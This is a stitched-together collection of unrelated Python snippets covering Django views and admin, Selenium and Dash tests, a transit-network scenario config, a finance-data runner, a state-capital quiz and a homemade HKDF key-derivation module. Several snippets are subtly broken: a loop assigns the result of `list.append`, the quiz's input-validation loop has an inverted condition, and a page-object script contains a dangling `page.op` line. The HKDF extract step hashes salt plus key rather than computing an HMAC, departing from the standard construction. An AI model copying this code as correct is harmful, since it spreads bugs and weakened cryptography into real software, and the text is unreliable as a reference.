return render(request, 'klasifikasi/index.html', {"excel_data":excel_data, 'data' : uri, 'latih' : latih, 'uji' : uji, 'akurasi' : str(akurasi), 'rata2' : rata2, 'data_prediksi' : data_prediksi})
# return HttpResponse(request, 'klasifikasi/index.html', list(akurasi)) |
import sys
sys.path.append('../../..//pyzx')
import pyzx as zx
import matplotlib.pyplot as plt
circ = zx.Circuit.load("simple.qasm")
g = circ.to_graph()
# zx.spider_simp(g)
# zx.draw(g)
# plt.show()
tikz = g.to_tikz()
print(tikz)
|
x=0
a=int(input("Digite um número terminado em 0"))
list = [a]
while list[x] != 0:
list = list.append(int(input("Digite um número terminado em 0")))
x
print(list)
|
# coding: utf-8
import os
import sys
import unittest
from selenium import webdriver
sys.path.append(os.environ.get('PY_DEV_HOME'))
from webTest_pro.common.initData import init
from webTest_pro.common.model.baseActionAdd import admin_login, add_tenants
from webTest_pro.common.logger import logger, T_INFO
reload(sys)
sys.setdefaultencoding("utf-8")
loginInfo = init.loginInfo
tenantAdd = [{'areaid': "//div[@id='treeview']/ul/li[17]", 'platmarkName': u'河南教育局', 'platmarkCode': '001'}]
tenantData = [{'platmarkName': u'张三教育局11', 'platmarkCode': '002', 'searchName': u'张三教育局'}]
tenantDel = [{'searchName': u'张三教育局11'}, {'searchName': u'李四教育局'}]
class tenantmanger(unittest.TestCase):
'''租户管理场景'''
def setUp(self):
if init.execEnv['execType'] == 'local':
T_INFO(logger,"\nlocal exec testcase")
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(8)
self.verificationErrors = []
self.accept_next_alert = True
T_INFO(logger,"start tenantmanger...")
else:
T_INFO(logger,"\nremote exec testcase")
browser = webdriver.DesiredCapabilities.CHROME
self.driver = webdriver.Remote(command_executor=init.execEnv['remoteUrl'], desired_capabilities=browser)
self.driver.implicitly_wait(8)
self.verificationErrors = []
self.accept_next_alert = True
T_INFO(logger,"start tenantmanger...")
def tearDown(self):
self.driver.quit()
self.assertEqual([], self.verificationErrors)
T_INFO(logger,"tenantmanger end!")
def test_add_tenant(self):
'''添加租户'''
print "exec: test_add_tenant..."
driver = self.driver
admin_login(driver)
for itme in tenantAdd:
add_tenants(driver, **itme)
print "exec: test_add_tenant OK"
if __name__ == '__main__':
unittest.main()
|
import os
import collections
# MANDATORY. Set this to be the Project Name.
# e.g. "RTP2021", "TIP2021", etc
PROJECT = "NGF"
# MANDATORY. Set this to be the git tag for checking out network projects.
#TAG = "HEAD" # Use this tag if you want NetworkWrangler to use the latest version in the local repo to build the network
#TAG = "PBA50_Blueprint" # Use this tag if you want to replicate the network built for PBA50
TAG = "HEAD"
# A project can either be a simple string, or it can be
# a dictionary with with keys 'name', 'tag' (optional), and 'kwargs' (optional)
# to specify a special tag or special keyword args for the projects apply() call.
# For example:
# {'name':"Muni_TEP", 'kwargs':{'servicePlan':"'2012oct'"}}
###########################################################
# NextGenFwy projects
# Pathways - note these are 2035 projects
NGF_PROJECTS = {
'BlueprintSegmented':{
'hwy':[
'NGF_BlueprintSegmented', # All lane tolling on freeways
],
'trn':[]
},
# Pathway 1a: All-lane tolling + Improve Transit Experience (new numbering in AG10: P1a_AllLaneTolling_ImproveTransit --> 3A)
# https://app.asana.com/0/1203644633064654/1203644636776961/f
'P1a_AllLaneTolling_ImproveTransit':{
'hwy':[
'NGF_BlueprintSegmented', # All lane tolling on freeways
'Futures_C4_ReX_Express', # New Transit Service Near Tolling: ReX Express
'ReX_link', # New Transit Service Near Tolling: ReX Link
'NGF_CarpoolLanes', # Carpool Lanes
'NGF_TransitPriorityOnArterials', # Transit Priority - All Lane Tolling
'Transform_I680_Multimodal_Imp',
'FBP_CC_036_I80_ExpBus_Impr',
'FBP_NP_040_VINE_Exp_Bus_Enhancements',
'FBP_MR_018_US101_BOS',
'MAJ_MuniForward_Uncommitted',
'MAJ_AC_Frequency_Improvement',
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
'Futures_C4_ReX_Express', # New Transit Service Near Tolling: ReX Express
'ReX_link', # New Transit Service Near Tolling: Rex Link
'Transform_I680_Multimodal_Imp',
'FBP_CC_036_I80_ExpBus_Impr',
'FBP_SL_026_SolExpressBus',
'MAJ_MuniForward_Uncommitted',
'VTA_Next',
'MAJ_AC_Frequency_Improvement',
'FBP_MuniForward_Uncommitted_Rail',
# Local Transit Frequency Boosts 2
# Parameters defined here: https://app.asana.com/0/0/1203931443540514/f
{'name':'NGF_IncreaseTrnFreqXferRoutes2BartCaltrainFerry', 'kwargs':{
'top_n_local':'2',
# configure by mode: https://github.com/BayAreaMetro/modeling-website/wiki/TransitModes
'min_headway':'{"local_default":15, 21:10, 24:10, 27:10, 28:10, 30:10, 111:10}',
'include_connections_to_express_bus':'True',
# this directory is used to determine which routes have frequency increases. So to include ReX Express bus routes,
# use a directory that includes ReX Express routes (e.g. an earlier iteration of this scenario)
'transit_assignment_dir':'r"L:\\Application\\Model_One\\NextGenFwys\\Scenarios\\2035_TM152_NGF_ReXExpress_ReXLink_trnassignment\\OUTPUT\\trn"'
}},
# Trunkline Transit Frequency Boosts 2
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'10',
'include_rail':'False'
}},
# Extended Transit Service Hours
{'name':'NGF_TrnExtendedServiceHours', 'kwargs':{'EV_headway':'15'}},
]
},
# Pathway 1b: All-lane tolling + Focus on Affordability (new numbering in AG10: P1b_AllLaneTolling_Affordable --> 3B)
# https://app.asana.com/0/1203644633064654/1203644636776965/f
'P1b_AllLaneTolling_Affordable':{
'hwy':[
'NGF_BlueprintSegmented', # All lane tolling on freeways
'NGF_CarpoolLanes', # Carpool Lanes
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
# Trunkline Transit Frequency Bosts 2
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'10',
'include_rail':'False'
}}
]
},
# new numbering in AG10: P2a_AllLaneTollingPlusArterials_ImproveTransit --> 4A)
'P2a_AllLaneTollingPlusArterials_ImproveTransit':{
'hwy':[
'NGF_BlueprintSegmented', # All lane tolling on freeways
'Futures_C4_ReX_Express', # New Transit Service Near Tolling: ReX Express
'ReX_link', # New Transit Service Near Tolling: ReX Link
'NGF_CarpoolLanes', # Carpool Lanes
'NGF_TransitPriorityOnArterials', # Transit Priority - All Lane Tolling
'Transform_I680_Multimodal_Imp',
'FBP_CC_036_I80_ExpBus_Impr',
'FBP_NP_040_VINE_Exp_Bus_Enhancements',
'FBP_MR_018_US101_BOS',
'MAJ_MuniForward_Uncommitted',
'MAJ_AC_Frequency_Improvement',
'NGF_Arterials', # Code arterials for tolling in Pathway 2
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
'Futures_C4_ReX_Express', # New Transit Service Near Tolling: ReX Express
'ReX_link', # New Transit Service Near Tolling: Rex Link
'Transform_I680_Multimodal_Imp',
'FBP_CC_036_I80_ExpBus_Impr',
'FBP_SL_026_SolExpressBus',
'MAJ_MuniForward_Uncommitted',
'VTA_Next',
'MAJ_AC_Frequency_Improvement',
'FBP_MuniForward_Uncommitted_Rail',
# Local Transit Frequency Boosts 2
# Parameters defined here: https://app.asana.com/0/0/1203931443540514/f
{'name':'NGF_IncreaseTrnFreqXferRoutes2BartCaltrainFerry', 'kwargs':{
'top_n_local':'2',
# configure by mode: https://github.com/BayAreaMetro/modeling-website/wiki/TransitModes
'min_headway':'{"local_default":15, 21:10, 24:10, 27:10, 28:10, 30:10, 111:10}',
'include_connections_to_express_bus':'True',
# this directory is used to determine which routes have frequency increases. So to include ReX Express bus routes,
# use a directory that includes ReX Express routes (e.g. an earlier iteration of this scenario)
'transit_assignment_dir':'r"L:\\Application\\Model_One\\NextGenFwys\\Scenarios\\2035_TM152_NGF_ReXExpress_ReXLink_trnassignment\\OUTPUT\\trn"'
}},
# Trunkline Transit Frequency Boosts 2
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'10',
'include_rail':'False'
}},
# Extended Transit Service Hours
{'name':'NGF_TrnExtendedServiceHours', 'kwargs':{'EV_headway':'15'}},
]
},
# new numbering in AG10: P2b_AllLaneTollingPlusArterials_Affordable --> 4B)
'P2b_AllLaneTollingPlusArterials_Affordable':{
'hwy':[
'NGF_BlueprintSegmented', # All lane tolling on freeways
'NGF_CarpoolLanes', # Carpool Lanes
'NGF_Arterials', # Code arterials for tolling in Pathway 2
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
# Trunkline Transit Frequency Bosts 2
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'10',
'include_rail':'False'
}}
]
},
# new numbering in AG10: P3a_3Cordons_ImproveTransit --> 2A
'P3a_3Cordons_ImproveTransit':{
'hwy':[
'MAJ_SF_Congestion_Pricing', # San Francisco Cordon Pricing
'NGF_AL_Cordon', # Oakland Cordon Pricing
'NGF_SC_Cordon', # San Jose Cordon Pricing
'MAJ_MuniForward_Uncommitted',
'MAJ_AC_Frequency_Improvement',
'Futures_C4_ReX_Express', # New Transit Service Near Tolling: ReX Express
'ReX_link', # New Transit Service Near Tolling: ReX Link
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
'NGF_TransitPriorityCordons' # Transit Priority - Cordons
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
'MAJ_SF_Congestion_Pricing',
'MAJ_MuniForward_Uncommitted',
'VTA_Next',
'MAJ_AC_Frequency_Improvement',
'FBP_MuniForward_Uncommitted_Rail',
'Futures_C4_ReX_Express', # New Transit Service Near Tolling: ReX Express
'ReX_link', # New Transit Service Near Tolling: ReX Link
# Trunkline Transit Frequency Bosts 1
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'15',
'include_rail':'False'
}},
# Local Transit Frequency Boosts Cordons
{'name':'NGF_TrnFreqBoostsCordons', 'kwargs':{
'top_n_local':'15',
'min_headway':'7',
'min_headway_LRT':'10',
'transit_assignment_dir':'r"L:\\Application\\Model_One\\NextGenFwys\\Scenarios\\2035_TM152_NGF_ReXExpress_ReXLink_trnassignment\\OUTPUT\\trn"'
}},
# Extended Transit Service Hours - Cordons
{'name':'NGF_TrnExtendedServiceHours_Cordons', 'kwargs':{
'top_n_local':'15',
'EV_headway':'10',
'transit_assignment_dir':'r"L:\\Application\\Model_One\\NextGenFwys\\Scenarios\\2035_TM152_NGF_ReXExpress_ReXLink_trnassignment\\OUTPUT\\trn"'
}},
]
},
# new numbering in AG10: P3b_3Cordons_Affordable --> 2B
'P3b_3Cordons_Affordable':{
'hwy':[
'MAJ_SF_Congestion_Pricing', # San Francisco Cordon Pricing
'NGF_AL_Cordon', # Oakland Cordon Pricing
'NGF_SC_Cordon', # San Jose Cordon Pricing
'MAJ_MuniForward_Uncommitted',
'MAJ_AC_Frequency_Improvement',
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
'MAJ_SF_Congestion_Pricing',
'MAJ_MuniForward_Uncommitted',
'VTA_Next',
'MAJ_AC_Frequency_Improvement',
'FBP_MuniForward_Uncommitted_Rail',
# Trunkline Transit Frequency Bosts 1
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'15',
'include_rail':'False'
}},
# Local Transit Frequency Boosts Cordons
{'name':'NGF_TrnFreqBoostsCordons', 'kwargs':{
'top_n_local':'15',
'min_headway':'7',
'min_headway_LRT':'10',
'transit_assignment_dir':'r"L:\\Application\\Model_One\\NextGenFwys\\Scenarios\\2035_TM152_NGF_ReXExpress_ReXLink_trnassignment\\OUTPUT\\trn"'
}}
]
},
# new numbering in AG10: P4_NoNewPricing --> P1
'P4_NoNewPricing':{
'hwy':[
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
# Trunkline Transit Frequency Bosts 2
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'10',
'include_rail':'False'
}}
]
},
# All-lane tolling pricing strategy only: https://app.asana.com/0/1201809392759895/1205309291141002/f
'P1x_AllLaneTolling_PricingOnly':{
'hwy':[
'NGF_BlueprintSegmented', # All lane tolling on freeways
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
# Trunkline Transit Frequency Bosts 2
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'10',
'include_rail':'False'
}}
]
}
}
# Put them together for NETWORK_PROJECTS
NETWORK_PROJECTS = collections.OrderedDict()
# we're only building 2035
for YEAR in [2035]:
NETWORK_PROJECTS[YEAR] = {
'hwy':NGF_PROJECTS[SCENARIO]['hwy'],
'trn':NGF_PROJECTS[SCENARIO]['trn']
}
# handle net_remove, nets keywords
for netmode in ['hwy','trn']:
# iterate backwards via index to delete cleanly
for project_idx in range(len(NETWORK_PROJECTS[YEAR][netmode])-1,-1,-1):
project = NETWORK_PROJECTS[YEAR][netmode][project_idx]
# special handling requires project to be specified as dictionary
if not isinstance(project, dict): continue
# variants_exclude: specifies list of network variants for which this project should be *excluded*
if 'variants_exclude' in project.keys() and NET_VARIANT in project['variants_exclude']:
Wrangler.WranglerLogger.info("Removing {} {} {}".format(YEAR, netmode, project))
del NETWORK_PROJECTS[YEAR][netmode][project_idx]
continue
# variants_include: specifies list of network variants for which this project should be *included*
# if this keyword is present, then this project is included *only* for variants in this list
if 'variants_include' in project.keys() and NET_VARIANT not in project['variants_include']:
Wrangler.WranglerLogger.info("Removing {} {} {}".format(YEAR, netmode, project))
del NETWORK_PROJECTS[YEAR][netmode][project_idx]
continue
# For every year where a project is applied do the following:
# Convert all zero-length links to 0.01
# Move buses to HOV/Express lanes at the end
#
for YEAR in NETWORK_PROJECTS.keys():
# if anything is applied
if ((len(NETWORK_PROJECTS[YEAR]['hwy']) > 0) or (len(NETWORK_PROJECTS[YEAR]['trn']) > 0)):
NETWORK_PROJECTS[YEAR]['hwy'].append('No_zero_length_links')
if ((len(NETWORK_PROJECTS[YEAR]['hwy']) > 0) or (len(NETWORK_PROJECTS[YEAR]['trn']) > 0)):
NETWORK_PROJECTS[YEAR]['trn'].append('Move_buses_to_HOV_EXP_lanes')
# OPTIONAL. The default route network project directory is Y:\networks. If
# projects are stored in another directory, then use this variable to specify it.
# For example: Y:\networks\projects
# NETWORK_BASE_DIR = None
# NETWORK_PROJECT_SUBDIR = None
# NETWORK_SEED_SUBDIR = None
# NETWORK_PLAN_SUBDIR = None
# OPTIONAL. A list of project names which have been previously applied in the
# PIVOT_DIR network that projects in this project might rely on. For example
# if DoyleDrive exists, then Muni_TEP gets applied differently so transit lines
# run on the new Doyle Drive alignment
APPLIED_PROJECTS = None
# OPTIONAL. A list of project names. For test mode, these projects won't use
# the TAG. This is meant for developing a network project.
TEST_PROJECTS = []
|
import hashlib
import hmac as _hmac
DEFAULT_HASH = "sha512"
def hash_function(data, algorithm=DEFAULT_HASH):
return getattr(hashlib, algorithm.lower())(data).digest()
def hmac(data, key, algorithm=DEFAULT_HASH):
return _hmac.HMAC(key, data, getattr(hashlib, algorithm.lower())).digest()
def _extract(input_keying_material, salt, hash_function=DEFAULT_HASH):
hasher = getattr(hashlib, hash_function.lower())
return hasher(salt + bytes(input_keying_material)).digest()
def _expand(psuedorandom_key, length=32, info='', hash_function=DEFAULT_HASH):
outputs = [b'']
hasher = getattr(hashlib, hash_function)
blocks, extra = divmod(length, hasher().digest_size)
blocks += 1 if extra else 0
for counter in range(blocks):
outputs.append(_hmac.HMAC(psuedorandom_key,
outputs[-1] + info + chr(counter),
hasher).digest())
return b''.join(outputs)[:length]
def hkdf(input_keying_material, length, info='', salt='', hash_function=DEFAULT_HASH):
return _expand(_extract(input_keying_material, salt),
length, info, hash_function) |
# This is a sample Python script.
# Press Shift+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
from FinanceData.DailyData import downloadDividendData, downloadDailyData, readDailyDataWithDividen, \
readExtraInvestingData, readFF3Factor_ResearchData, readDailyData, \
readDailyDataWithDividenIndia
from FinanceData.ChromeDriverSetter import webDriverWithCustimizedDownloadLocaiton
# This is a runner
if __name__ == '__main__':
# stock_name = "ABX.TO"
# stock_name = "^CRSPTM1"
# download the dividend data
# downloadDividendData(stock_name)
# download the price data
# downloadDailyData(stock_name)
# save the result into an excel csv file
# readDailyDataWithDividen(stock_name, "2011-10-1", "2021-10-1")
# without assign a start/end date, it will use the time range: start_date="2003-1-1", end_date="2012-12-31"
# readDailyDataWithDividen(stock_name)
# this is the replacement data for CRSP, WE USED CRSPTM1
# readExtraInvestingData("CRSP-Investing")
# this is the DJ global index W1DOW W1DOW-Investing
# readExtraInvestingData("W1DOW-Investing")
# readFF3Factor_ResearchData("FF3Factors")
#######################################################################################################################
# 0) ABX is from an india website: https://in.investing.com/indices/the-global-dow-usd-historical-data
# 1) IBM
# readDailyDataWithDividen("IBM", "2011-10-1","2021-10-1")
# 2) KEP
# readDailyDataWithDividen("KEP", "2011-10-1", "2021-10-1")
# 3) Siemens SIEGY
# readDailyDataWithDividen("SIEGY", "2011-10-1", "2021-10-1")
# 4) Group Televisa TV
# readDailyDataWithDividen("TV", "2011-10-1", "2021-10-1")
# 5) YPF
# readDailyDataWithDividen("YPF", "2011-10-1", "2021-10-1")
# 6) Australia EWA
# readDailyDataWithDividen("EWA", "2011-10-1", "2021-10-1")
# 7) Canada EWC
# readDailyDataWithDividen("EWC", "2011-10-1", "2021-10-1")
# 8) Germany EWG
# readDailyDataWithDividen("EWG", "2011-10-1", "2021-10-1")
# 8) Malaysia EWM
# readDailyDataWithDividen("EWM", "2011-10-1", "2021-10-1")
# 8) mEXICO EWW
# readDailyDataWithDividen("EWW", "2011-10-1", "2021-10-1")
# 9) Singapore EWS
# readDailyDataWithDividen("EWS", "2011-10-1", "2021-10-1")
# 9) SPY 500
# readDailyDataWithDividen("SPY", "2011-10-1", "2021-10-1")
# 10) CRSPTM1
# readExtraInvestingData("CRSP-Investing", "2011-10-1", "2021-10-1")
# 11) ABX
# readDailyDataWithDividenIndia("ABXIndia", "2011-10-1", "2021-10-1")
readExtraInvestingData("W1DOW-Investing", "2011-10-1", "2021-10-1")
|
"""
RELEASES
Contiene archivos de cada release
Autor: Pablo Pizarro R. @ ppizarror.com
Licencia:
The MIT License (MIT)
Copyright 2017 Pablo Pizarro R.
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = [
'DEPTOS',
'REL_ARTICULO',
'REL_AUXILIAR',
'REL_CONTROLES',
'REL_INFORME',
'REL_POSTER',
'REL_PRESENTACION',
'REL_PROFESSIONALCV',
'REL_REPORTE',
'REL_TESIS',
'RELEASES'
]
# Importación de librerías
import json
import os
# Se carga json
__actualpath = str(os.path.abspath(os.path.dirname(__file__))).replace('\\', '/') + '/'
with open(__actualpath + 'releases.json', encoding='utf8') as json_data:
RELEASES = json.load(json_data)
with open(__actualpath + 'deptos.json', encoding='utf8') as json_data:
DEPTOS = json.load(json_data)['DEPTOS']
# Constantes
REL_ARTICULO = 'ARTICULO'
REL_AUXILIAR = 'AUXILIAR'
REL_CONTROLES = 'CONTROLES'
REL_INFORME = 'INFORME'
REL_POSTER = 'POSTER'
REL_PRESENTACION = 'PRESENTACION'
REL_PROFESSIONALCV = 'PROFESSIONAL-CV'
REL_REPORTE = 'REPORTE'
REL_TESIS = 'TESIS'
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from SAAS_UI_TEST.framework.browser_engine import BrowserEngine
from SAAS_UI_TEST.pageObject.saasMainPage import saasMainPage
class registerPage(saasMainPage):
#菜单元素定位
registerMenu1_loc = 'xpath >> /html/body/div[1]/div/div/div[1]/div[1]/div[1]/div/div/div/div/ul/li[3]/ul/li[4]/p'
registerMenu2_loc = 'xpath >> /html/body/div[1]/div/div/div[1]/div[3]/ul/li[4]/p'
currentTapTitle_loc = 'xpath >> /html/body/div[1]/div/div/div[1]/ul[1]/li/p[2]'
registerFrame_loc = 'xpath >> /html/body/div[1]/div/div/div[1]/div[4]/iframe'
tabClose_loc = 'xpath >> /html/body/div[1]/div/div/div[1]/ul[1]/li/p[1]/span'
#页面控件元素定位
registerBtn_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[15]/button'
regType0_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[1]/div[2]/p/select'
regType1_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[1]/div[2]/p/select/option[1]'
regType2_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[1]/div[2]/p/select/option[2]'
email_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[3]/div[2]/p/input'
password_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[5]/div[2]/p/input'
firstname_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[6]/div[2]/p/input'
lastname_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[7]/div[2]/p/input'
selectCountryBtn_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[10]/div[2]/p/button'
selectCountryTitle_loc = 'xpath >> /html/body/div[1]/div/div[4]/div/div/div[1]/h4'
contryListSearch_loc = 'xpath >> /html/body/div[1]/div/div[4]/div/div/div[2]/div[1]/div[2]/input'
contryListSearchBtn_loc = 'xpath >> /html/body/div[1]/div/div[4]/div/div/div[2]/div[1]/button'
countryListSelectIn_loc = 'xpath >> /html/body/div[1]/div/div[4]/div/div/div[2]/div[2]/div[1]/table/tbody/tr[1]/td[1]/input'
def registerEamilUser(self,username):
self.click(self.regType0_loc) #选择注册类型
self.click(self.regType1_loc) #选择邮箱用户
self.send_keys(self.email_loc,username) #输入邮箱
self.send_keys(self.password_loc,'123456') #输入密码
self.click(self.selectCountryBtn_loc)
t = self.get_text(self.selectCountryTitle_loc)
if t == '选择国家或地区':
print("选择国家弹窗打开成功!!")
self.send_keys(self.contryListSearch_loc,'cn')
self.click(self.contryListSearchBtn_loc)
self.click(self.countryListSelectIn_loc)
driver = BrowserEngine().open_browser()
page = registerPage(driver)
page.op
page.registerEamilUser("20200724001@a.com")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author = 'wyx'
@time = 16/5/25 14:30
@annotation = ''
"""
from etc import config
import os
from base import logger, smartpool, poolmysql
def init():
# log setting
logger.init_log([(n, os.path.join("logs", p), l)
for n, p, l in config.log_config])
# pool setting
smartpool.coroutine_mode = config.pool_coroutine_mode
if config.debug and getattr(config, "pool_log", None) is not None:
smartpool.pool_logger = logger.get(config.pool_log).info
# mysql setting
if config.debug and getattr(config, "db_query_log", None) is not None:
poolmysql.query_logger = logger.get(config.db_query_log).info
for name, setting in config.db_config.iteritems():
smartpool.init_pool(
name, setting, poolmysql.MySQLdbConnection, *config.db_conn_pool_size,
maxidle=config.db_connection_idle, clean_interval=config.db_pool_clean_interval
)
|
from ._Pose_msg import *
from ._simpleVelocity import *
from ._Encoder_msg import *
from ._i2cData import *
|
#Sean Kim
#Unit 3 State Capital Quiz
import random
# Dictionary of the valid quizzes available to the user.
# The key is the label and the value is the data file name.
data_files = {"East": "states_east.txt",
"West": "states_west.txt",
"South": "states_south.txt",
"North": "states_north.txt",
}
def read_states_into_dict (file_name):
text_file = open (file_name, "r")
dict = {}
for i in text_file:
i = i.strip()
list = i.split("\t")
dict[list[0]]=list[1]
return dict
def quiz (my_dict):
answer = ""
counter = 0
cc = 0
while (len(my_dict)!= 0) and (answer.lower() != "quit"):
state = random.choice(list(my_dict.keys()))
answer = input("What is the capital of " + state + "?\n")
if answer.title() == my_dict.get(state, 0):
print("Correct!")
del(my_dict[state])
counter += 1
cc += 1
elif answer.title() != state:
print ("Incorrect! The capital of " + state + " is " + my_dict.get(state,0))
counter += 1
elif answer.lower() == "quit":
my_dict = {}
print ("Wow! You got", cc, "correct in", counter, "guesses!")
def get_datafile_choice():
region = input("Which region would you like to be tested on?\nCentral East South West All")
if region.lower() == "central":
region = "states_central.txt"
elif region.lower() == "east":
region = "states_east.txt"
elif region.lower() == "south":
region = "states_south.txt"
elif region.lower() == "west":
region = "states_west.txt"
elif region.lower() == "all":
region = "states_all.txt"
else:
while region.lower() == "central" or region.lower() == "east" or region.lower() == "south" or region.lower() == "west" or region.lower() == "all":
region = input("Invalid submission. Please enter a valid choice.")
return region
def main ():
file_name = get_datafile_choice()
my_dict = read_states_into_dict (file_name)
quiz (my_dict)
main() |
from django.contrib import admin
from .models import Bike_model, Bike, Bike_rent
# Register your models here.
# import and export via admin action
from import_export.admin import ImportExportActionModelAdmin
def send_for_repair(modeladmin, request, queryset):
queryset.update(status='ре')
send_for_repair.short_description = "Change the status of bikes to 'repair'"
class Bike_modelAdmin(ImportExportActionModelAdmin):
list_display = ('id', 'name', 'type_bike', 'wheel_size', 'speeds', 'frame', 'brakes', 'seat', 'rudder', 'footrest', 'weight')
list_filter = ('type_bike', 'wheel_size', 'speeds', 'frame', 'brakes', 'seat')
search_fields = ('id', 'name', 'weight')
class BikeAdmin(ImportExportActionModelAdmin):
list_display =('id', 'brand', 'bike_model_id', 'price', 'year', 'location_id', 'color', 'status')
list_filter = ('price', 'year', 'brand', 'status', 'color')
search_fields = ('id', 'year', 'brand')
list_editable = ('status',)
actions = [send_for_repair, 'export_admin_action']
def bike_model_id(self, obj):
url = (
reverse("admin:bike_bike_model_changelist")
+ "?"
+ urlencode({"bike_model_id": f"{obj.id}"})
)
return format_html('<a href="{}">Model</a>', url)
bike_model_id.short_description = "bike_model"
class Bike_rentAdmin(ImportExportActionModelAdmin):
list_display = ('id', 'user_id', 'bike_id', 'status', 'start', 'end', 'region', 'delivery_to_id', 'delivery_from_id', 'limit', 'price')
list_filter = ('status', 'start', 'end', 'region', 'limit')
search_fields = ('id', 'start', 'end', 'region','limit', 'price', 'comment')
list_editable = ('status',)
admin.site.register(Bike_model, Bike_modelAdmin)
admin.site.register(Bike, BikeAdmin)
admin.site.register(Bike_rent, Bike_rentAdmin) |
from random import randint
def length_is_odd(length):
return length % 2 != 0
def generate_random_array(length_array):
array = set()
while len(array) != length_array:
array.add(randint(0, 255))
return list(array)
def reverse_right_part_array(array):
start = len(array) // 2
end = len(array) - 1
while start < end:
array[start], array[end] = array[end], array[start]
start += 1
end -= 1
def sort_array(array):
array.sort()
reverse_right_part_array(array)
def converter_array_to_start_impulse(array):
if length_is_odd(len(array)):
sort_array(array)
return array
else:
return None
# def converter_array_to_start_impulse(array):
# if length_is_odd(len(array)):
# array.sort()
# right_part_array = array[len(array) // 2:]
# array[len(array) // 2:] = right_part_array[::-1]
# return array
# else:
# return None
|
from dash import Dash, dcc, html
from dash.dependencies import Input, Output
from dash_bootstrap_components import NavLink
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
def test_dbnl001_auto_active(dash_duo):
"""
Checks that NavLink is able to automatically set active status based on the
current location.
"""
app = Dash()
app.layout = html.Div(
[
# dcc.Location is required to fire events to History
dcc.Location(id="url"),
NavLink("Page 1", id="page-1-link", href="/page-1", active=True),
NavLink("Page 2", id="page-2-link", href="/page-2", active=False),
NavLink(
"Page 3", id="page-3-link", href="/page-3", active="partial"
),
NavLink(
"Page 3 - extra",
id="page-3-extra-link",
href="/page-3/extra",
active="exact",
),
html.Div(id="content"),
]
)
dash_duo.start_server(app)
assert "active" in dash_duo.wait_for_element_by_id(
"page-1-link"
).get_attribute("class")
assert "active" not in dash_duo.wait_for_element_by_id(
"page-2-link"
).get_attribute("class")
assert "active" not in dash_duo.wait_for_element_by_id(
"page-3-link"
).get_attribute("class")
assert "active" not in dash_duo.wait_for_element_by_id(
"page-3-extra-link"
).get_attribute("class")
dash_duo.wait_for_element_by_id("page-3-link").click()
assert "active" in dash_duo.wait_for_element_by_id(
"page-1-link"
).get_attribute("class")
assert "active" not in dash_duo.wait_for_element_by_id(
"page-2-link"
).get_attribute("class")
assert "active" in dash_duo.wait_for_element_by_id(
"page-3-link"
).get_attribute("class")
assert "active" not in dash_duo.wait_for_element_by_id(
"page-3-extra-link"
).get_attribute("class")
dash_duo.wait_for_element_by_id("page-3-extra-link").click()
assert "active" in dash_duo.wait_for_element_by_id(
"page-1-link"
).get_attribute("class")
